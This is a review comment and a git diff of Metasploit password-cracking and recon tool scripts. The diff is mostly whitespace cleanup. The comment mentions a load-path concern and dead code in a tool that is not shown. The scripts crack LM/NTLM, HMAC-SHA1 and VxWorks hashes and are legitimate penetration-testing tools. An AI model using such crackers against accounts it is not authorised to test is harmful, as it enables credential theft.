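Review bot: The new tool keeps `$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']`, putting an environment-chosen directory ahead of the framework's own `lib` on the load path, while this same commit deletes exactly that line from msfd, msfrpc and msfrpcd (and list_interfaces.rb still carries it as context further down); unless this script has a need the others lack, drop it here too so every entry point resolves `rex`/`msf` from the same place. Separately, `sort = 0` is never reassigned by any option, so the `if sort == 1 ... tbl.sort_rows(1)` branch is unreachable and should either be wired to a real flag in `opts` or removed. Whether `Rex::Parser::Arguments` guarantees a non-nil `val` for an option declared with `true` is not visible here; if it does not, `-f` given without a value would fail at `val.downcase`, which `val.to_s.downcase` would cover cheaply.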
diff --git a/tools/password/cpassword_decrypt.rb b/tools/password/cpassword_decrypt.rb index ed0fca7d77..335809e925 100755 --- a/tools/password/cpassword_decrypt.rb +++ b/tools/password/cpassword_decrypt.rb @@ -79,7 +79,6 @@ class CPassword end end - # # Shows script usage # @@ -88,7 +87,6 @@ def usage exit end - # # Prints a status message # @@ -96,7 +94,6 @@ def print_status(msg='') $stderr.puts "[*] #{msg}" end - # # Prints an error message # @@ -104,7 +101,6 @@ def print_error(msg='') $stderr.puts "[-] #{msg}" end - # # Prints a good message # @@ -112,7 +108,6 @@ def print_good(msg='') $stderr.puts "[+] #{msg}" end - # # main # diff --git a/tools/password/halflm_second.rb b/tools/password/halflm_second.rb index 5bfa44dfb8..21f312c2ca 100755 --- a/tools/password/halflm_second.rb +++ b/tools/password/halflm_second.rb @@ -39,7 +39,6 @@ $args = Rex::Parser::Arguments.new( "-s" => [ true, "The server challenge (default value 1122334455667788)" ], "-h" => [ false, "Display this help information" ]) - $args.parse(ARGV) { |opt, idx, val| case opt when "-n" @@ -81,8 +80,6 @@ if(pass.length != 7) exit end - - pass = pass.upcase hash = hash.downcase @@ -123,7 +120,6 @@ end end end - puts "[*] Trying four characters (eta: #{etime * cset.length * cset.length * cset.length} seconds)..." 0.upto(cset.length-1) do |c1| 0.upto(cset.length-1) do |c2| diff --git a/tools/password/hmac_sha1_crack.rb b/tools/password/hmac_sha1_crack.rb index 2359f01249..fb1acae806 100755 --- a/tools/password/hmac_sha1_crack.rb +++ b/tools/password/hmac_sha1_crack.rb @@ -2,7 +2,7 @@ # # $Id$ # -# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools +# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools # have issues with binary salt values and extremely large salt values. The primary # goal of this tool is to handle IPMI 2.0 HMAC SHA1 hashes. # 
@@ -29,7 +29,6 @@ def usage exit end - hash_inp = ARGV.shift || usage() word_inp = ARGV.shift || usage() @@ -51,17 +50,16 @@ hash_fd.each_line do |line| $stderr.puts "[-] Invalid hash entry, missing field: #{line}" next end - unless h_salt =~ /^[a-f0-9]+$/i + unless h_salt =~ /^[a-f0-9]+$/i $stderr.puts "[-] Invalid hash entry, salt must be in hex: #{line}" next end hashes << [h_id, [h_salt].pack("H*"), [h_hash].pack("H*") ] end -hash_fd.close - +hash_fd.close stime = Time.now.to_f -count = 0 +count = 0 cracked = 0 word_fd.each_line do |line| @@ -75,10 +73,10 @@ word_fd.each_line do |line| cracked += 1 end count += 1 - + if count % 2500000 == 0 $stderr.puts "[*] Found #{cracked} passwords with #{hashes.length} left (#{(count / (Time.now.to_f - stime)).to_i}/s)" - end + end end hashes.delete_if {|e| e[3] } break if hashes.length == 0 diff --git a/tools/password/lm2ntcrack.rb b/tools/password/lm2ntcrack.rb index 57d9ad0adc..c6be3ada62 100755 --- a/tools/password/lm2ntcrack.rb +++ b/tools/password/lm2ntcrack.rb @@ -70,7 +70,6 @@ $args = Rex::Parser::Arguments.new( "-d" => [ true, "The domain (machine) name (NETLMv2/NETNTLMv2 type only)" ], "-h" => [ false, "Display this help information" ]) - $args.parse(ARGV) { |opt, idx, val| case opt when "-t" @@ -122,7 +121,6 @@ else end end - if type == "HALFLM" or type == "LM" or type == "NTLM" then if srvchal != nil or clichal != nil or user != nil or domain != nil then $stderr.puts "[*] No challenge, user or domain must be provided with this type" @@ -872,5 +870,3 @@ else $stderr.puts "type must be of type : HALFLM/LM/NTLM/HALFNETLMv1/NETLMv1/NETNTLMv1/NETNTLM2_SESSION/NETLMv2/NETNTLMv2" exit end - - diff --git a/tools/password/md5_lookup.rb b/tools/password/md5_lookup.rb index 638cfac425..1f50786dce 100755 --- a/tools/password/md5_lookup.rb +++ b/tools/password/md5_lookup.rb @@ -37,7 +37,6 @@ require 'rex' require 'msf/core' require 'optparse' - # # Basic prints we can't live without # 
@@ -71,7 +70,6 @@ module Md5LookupUtility # @return [String] The name of the tool attr_accessor :group_name - def initialize self.config_file = Msf::Config.config_file self.group_name = 'MD5Lookup' @@ -93,7 +91,6 @@ module Md5LookupUtility end end - # Saves the waiver so the warning won't show again after ack # # @return [void] @@ -101,7 +98,6 @@ module Md5LookupUtility save_setting('waiver', true) end - # Returns true if we don't have to show the warning again # # @return [Boolean] @@ -109,7 +105,6 @@ module Md5LookupUtility load_setting('waiver') == 'true' ? true : false end - private # Saves a setting to Metasploit's config file @@ -124,7 +119,6 @@ module Md5LookupUtility ini.to_file(self.config_file) end - # Returns the value of a specific setting # # @param key_name [String] The name of the setting @@ -177,7 +171,6 @@ module Md5LookupUtility ) end - # Returns the found cracked MD5 hash # # @param md5_hash [String] The MD5 hash to lookup @@ -192,10 +185,8 @@ module Md5LookupUtility get_json_result(res) end - private - # Parses the cracked result from a JSON input # @param res [Rex::Proto::Http::Response] The Rex HTTP response # @return [String] Found cracked MD5 hash @@ -217,7 +208,6 @@ module Md5LookupUtility end - # This class parses the user-supplied options (inputs) class OptsConsole @@ -275,10 +265,8 @@ module Md5LookupUtility options end - private - # Returns the parsed options from ARGV # # raise [OptionParser::InvalidOption] Invalid option found @@ -317,7 +305,6 @@ module Md5LookupUtility return parser, options end - # Returns the actual database names based on what the user wants # # @param list [String] A list of user-supplied database names @@ -339,7 +326,6 @@ module Md5LookupUtility new_db_list end - # Returns a list of all of the supported database symbols # # @return [Array] Database symbols @@ -357,7 +343,6 @@ module Md5LookupUtility end end - # This class decides how this process works class Driver 
@@ -379,7 +364,6 @@ module Md5LookupUtility end end - # Main function # # @return [void] @@ -403,7 +387,6 @@ module Md5LookupUtility end end - # Cleans up the output file handler if exists # # @return [void] @@ -411,10 +394,8 @@ module Md5LookupUtility @output_handle.close if @output_handle end - private - # Saves the MD5 result to file # # @param result [Hash] The result that contains the MD5 information @@ -472,7 +453,6 @@ module Md5LookupUtility end - # # main # diff --git a/tools/password/vxencrypt.rb b/tools/password/vxencrypt.rb index f9d709ee55..109e7bf5cd 100755 --- a/tools/password/vxencrypt.rb +++ b/tools/password/vxencrypt.rb @@ -1,3 +1,5 @@ +#!/usr/bin/env ruby +# # $Id$ # # This script can be used to calculate hash values for VxWorks passwords. @@ -15,7 +17,6 @@ def hashit(inp) hackit(sum) end - def hackit(sum) magic = 31695317 res = ((sum * magic) & 0xffffffff).to_s @@ -29,4 +30,3 @@ end input = ARGV.shift || "flintstone" $stderr.puts "[*] Hash for password '#{input}' is #{hashit(input)}" - diff --git a/tools/password/vxmaster.rb b/tools/password/vxmaster.rb index e599b91be0..7521f48801 100755 --- a/tools/password/vxmaster.rb +++ b/tools/password/vxmaster.rb @@ -12,7 +12,6 @@ # $Revision$ # - # VxWorks converts the clear-text password into single integer value. This value # can only be one of about 210,000 possible options. The method below emulates # what the vxencrypt utility does and was implemented based on publicly indexed @@ -128,7 +127,6 @@ seeds = [] end seedsets << seeds - seeds = [] 8.upto(12) do |slen| 0x23.upto(0x7c) do |cset| @@ -165,7 +163,6 @@ seeds = [] end seedsets << seeds - # Calculate passwords and their hashes for all possible outputs 1.upto(209656) do |i| found = false @@ -200,4 +197,3 @@ seedsets << seeds exit(0) end end - diff --git a/tools/recon/list_interfaces.rb b/tools/recon/list_interfaces.rb index c2dcc3e58e..0cf1fb2169 100755 --- a/tools/recon/list_interfaces.rb +++ b/tools/recon/list_interfaces.rb 
@@ -19,7 +19,6 @@ require 'msfenv' $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] - if RUBY_PLATFORM == "i386-mingw32" begin require 'network_interface' diff --git a/tools/recon/makeiplist.rb b/tools/recon/makeiplist.rb index fd3f8dc97b..912fbdeddf 100755 --- a/tools/recon/makeiplist.rb +++ b/tools/recon/makeiplist.rb @@ -12,18 +12,17 @@ # mubix # - msfbase = __FILE__ while File.symlink?(msfbase) msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib'))) + require 'msfenv' require 'rex' require 'optparse' - class OptsConsole def self.parse(args) options = {'output' => 'iplist.txt'} @@ -78,7 +77,6 @@ Usage: #{__FILE__} [options]| end end - # # Prints IPs # @@ -91,7 +89,6 @@ def make_list(in_f, out_f) end end - # # Returns file handles # @@ -106,7 +103,6 @@ def load_files(in_f, out_f) return handle_in, handle_out end - options = OptsConsole.parse(ARGV) in_f, out_f = load_files(options['input'], options['output'])